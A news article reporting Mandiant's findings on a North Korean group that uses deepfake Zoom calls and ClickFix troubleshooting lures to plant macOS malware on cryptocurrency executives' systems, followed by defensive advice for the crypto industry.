North Korea Uses Deepfake Zoom Calls in Crypto Heists

North Korean hackers are using AI-generated deepfake videos in Zoom calls to trick cryptocurrency executives into installing malware. Google's Mandiant team detailed the campaign in a report exposing UNC1069, a financially motivated threat group responsible for some of the most sophisticated social engineering attacks targeting the crypto sector.

The attacks combine compromised executive accounts, deepfake technology, and the ClickFix technique—where victims are tricked into "fixing" fake technical problems that actually install malware. It's a multi-stage operation that blends legitimate-looking business communications with cutting-edge deception.

The Attack Sequence

The Record documented a specific incident: attackers contacted a cryptocurrency executive via Telegram using the compromised account of another crypto industry figure. The victim received a Calendly link for a 30-minute meeting containing a Zoom URL—nothing obviously suspicious about a business meeting invitation.

During the call, the victim saw what appeared to be a CEO from another cryptocurrency company. The video was a deepfake. Technical "issues" during the call were deliberately staged, with the attackers asking the victim to follow troubleshooting steps that secretly triggered malware installation through the ClickFix technique.

ClickFix has been around for a while—we covered Lazarus Group using similar tactics in fake job interview scenarios. But combining it with real-time deepfake video during a Zoom call represents a significant escalation in sophistication.

Multi-Platform Malware Stack

Mandiant identified an extensive macOS malware arsenal deployed by UNC1069:

• WAVESHAPER - Initial access component
• HYPERCALL - Secondary loader
• HIDDENCALL - Stealth communication module
• DEEPBREATH - Persistence mechanism
• CHROMEPUSH - Browser-based credential theft

The multi-stage approach lets attackers maintain access even if defenders identify and remove individual components. Each piece serves a specific function in the overall attack chain, from initial compromise through credential harvesting and persistent access.

AI-Powered Operations

Google's report revealed that UNC1069 uses Google's Gemini AI tool for operational research, tool development, and campaign planning. The group leverages AI across multiple phases of their operations—not just for generating deepfakes, but for gathering intelligence on targets, developing attack tools, and planning intrusions.

This aligns with broader trends in state-sponsored hacking. AI tools lower barriers to sophisticated attacks. Creating convincing deepfakes once required specialized expertise; now threat actors can generate them with accessible tools. The same applies to researching targets, crafting phishing lures, and developing malware.

$2 Billion in 2025 Alone

North Korean cryptocurrency theft isn't new, but the scale keeps growing. U.S. officials told the United Nations last month that dozens of countries dealt with crypto thefts perpetrated by North Korean hackers, with the regime accused of stealing more than $2 billion in cryptocurrency in 2025.

That money funds weapons programs and sanctions evasion. Unlike ransomware groups motivated by profit, North Korean hackers operate as an arm of state policy. They'll invest in sophisticated attacks—deepfake video production, multi-stage malware development, long-term account compromises—because the payoff scales with national priorities.

For deeper context on state-sponsored cyber operations, including how nations like North Korea integrate hacking into broader strategic objectives, see our recommended reading on cybersecurity history.

Protection for Crypto Industry Targets

Cryptocurrency executives and employees face elevated risk. Defensive measures should include:

Verify meeting invitations through separate channels: If someone you know requests a meeting, confirm via a different communication method—text, phone call, or verified email—before accepting.

Be suspicious of technical issues during calls: ClickFix attacks rely on victims following troubleshooting steps that execute malicious commands. If a meeting partner asks you to run terminal commands or paste text, that's a red flag.

Train staff to recognize deepfakes: While deepfake detection is imperfect, awareness that the technology exists helps. Audio or video that seems slightly off—unusual lip sync, strange lighting, robotic cadence—warrants additional verification.

Lock down cryptocurrency operations: Multi-signature wallets, hardware security keys, and transaction approval workflows add friction that prevents single-point-of-compromise losses.

Report suspicious contact: Industry information sharing helps defenders track evolving tactics. Report unusual outreach to relevant ISACs and security teams.

The Trend Line

North Korea's crypto theft operations grow more sophisticated each year. Deepfake technology democratizes impersonation attacks. ClickFix-style social engineering bypasses technical controls by exploiting human trust.

Cryptocurrency firms can't defend against this with technology alone. The attack surface is fundamentally human—people who receive meeting invitations, see familiar faces on video calls, and want to be helpful when technical problems arise. Our guide to detecting deepfakes provides practical techniques for identifying AI-generated video—training and awareness remain the front line.